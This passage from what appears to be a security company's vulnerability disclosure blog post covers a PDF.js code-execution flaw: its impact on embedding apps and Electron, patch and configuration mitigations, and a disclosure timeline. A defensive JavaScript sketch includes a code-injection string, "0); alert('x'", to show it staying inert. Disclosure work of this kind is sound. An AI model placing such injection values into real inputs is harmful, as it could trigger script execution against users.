In applications that embed PDF.js, the impact is potentially even worse. If no mitigations are in place (see below), this essentially gives an attacker an XSS primitive on the domain which includes the PDF viewer. Depending on the application this can lead to data leaks, malicious actions being performed in the name of a victim, or even a full account take-over. On Electron apps that do not properly sandbox JavaScript code, this vulnerability even leads to native code execution (!). We found this to be the case for at least one popular Electron app.

Mitigation 

At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.

The best mitigation against this vulnerability is to update PDF.js to version 4.2.67 or higher. Most wrapper libraries, like react-pdf, have also released patched versions. Because some higher-level PDF-related libraries statically embed PDF.js, we recommend recursively checking your node_modules folder for files called pdf.js, just to be sure. Headless use-cases of PDF.js (e.g., on the server side to obtain statistics and data from PDFs) seem not to be affected, but we didn’t thoroughly test this; updating is advised there as well.

Additionally, a simple workaround is to set the PDF.js option isEvalSupported to false. This will disable the vulnerable code path. If you have a strict Content Security Policy (disabling the use of eval and the Function constructor), the vulnerability is also not reachable.
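The idea behind the isEvalSupported=false path can be sketched as follows (simplified, our own code, not the actual PDF.js fallback): the command list is interpreted directly, so arguments stay data and are never concatenated into source code.

```javascript
// Interpret the command list instead of compiling it: a malicious
// string ends up as an ordinary string argument, not as code.
function interpret(cmds, c, size) {
  for (const { cmd, args = [] } of cmds) {
    const resolved = args.map(a =>
      a === "size" ? size : a === "-size" ? -size : a
    );
    c[cmd](...resolved);
  }
}

const seen = [];
const ctx = { transform: (...a) => seen.push(a) };
interpret(
  [{ cmd: "transform", args: [1, 2, 3, 4, 5, "0); alert('x'"] }],
  ctx,
  10
);
// seen[0][5] is the literal string "0); alert('x'" — nothing executed.
```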

Timeline 

  • 2024-04-26 – vulnerability disclosed to Mozilla
  • 2024-04-29 – PDF.js v4.2.67 released to NPM, fixing the issue
  • 2024-05-14 – Firefox 126, Firefox ESR 115.11 and Thunderbird 115.11 released including the fixed version of PDF.js
  • 2024-05-20 – publication of this blog post